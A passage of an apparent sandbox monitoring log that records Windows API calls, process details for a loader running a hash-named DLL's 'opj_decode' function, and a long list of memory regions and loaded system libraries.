[0188.716] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0188.716] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52a840 | out: hHeap=0x520000) returned 1 [0188.716] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5361b0 | out: hHeap=0x520000) returned 1 [0188.716] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0188.717] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0188.717] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0188.717] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0188.717] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0188.720] LocalFree (hMem=0x529310) returned 0x0 [0188.720] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0188.720] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0188.720] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x532b80 | out: hHeap=0x520000) returned 1 [0188.720] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534d20 | out: hHeap=0x520000) returned 1 [0188.722] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0188.722] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0188.722] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0188.722] ExitProcess (uExitCode=0x0) [0188.723] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52bec0 | out: hHeap=0x520000) returned 1 Thread: id = 138 os_tid = 0x11c4 Process: id = "15" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x10a31000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2109 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2110 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2111 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2112 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2113 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2114 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2115 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2116 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2117 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2118 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 2119 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2121 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2122 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2123 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2124 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2125 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 2126 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2127 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2128 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2129 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2131 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2132 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2133 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2134 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2135 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2136 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2137 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2138 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2139 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2140 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2141 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2142 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2143 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2144 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2145 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2146 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2147 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2148 start_va = 0x6d0000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 2149 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2150 start_va = 0x860000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 2151 start_va = 0x9f0000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 2152 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2153 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2154 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2155 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2156 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2162 start_va = 0x1df0000 end_va = 0x1eaffff monitored = 0 entry_point = 0x1e10da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2163 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 2171 start_va = 0x1df0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 2172 start_va = 0x1ef0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 2178 start_va = 0x20f0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2179 start_va = 0x24f0000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 2186 start_va = 0x2cf0000 end_va = 0x3cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 3238 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 3251 start_va = 0x3cc0000 end_va = 0x3ff6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3528 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3535 start_va = 0x4000000 end_va = 0x4289fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 3545 start_va = 0x4000000 end_va = 0x4144fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 3547 start_va = 0x4000000 end_va = 0x41bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 3806 start_va = 0x4000000 end_va = 0x5595fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 3866 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3867 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3868 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3872 start_va = 0x4000000 end_va = 0x41c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 3875 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3876 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3877 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3878 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3880 start_va = 0x4000000 end_va = 0x4165fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 3882 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3883 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3884 start_va = 0x4000000 end_va = 0x4021fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 3885 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3886 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3887 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3888 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3889 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3890 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3891 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3892 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3893 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3894 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3895 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3896 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3897 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3898 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3899 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3900 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3901 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3902 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3903 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3904 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3905 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3906 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3907 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3908 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3909 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3910 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3911 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3912 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3913 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3914 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3915 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3916 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3917 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3918 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3919 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3920 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3921 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3922 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3923 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3924 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3925 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3926 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3927 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3928 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3929 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3930 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3931 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3932 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3933 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3934 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3935 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3936 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3937 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3938 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3939 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3940 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3941 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3942 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3943 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3944 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3945 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3946 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3947 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3948 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3949 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3950 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3951 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 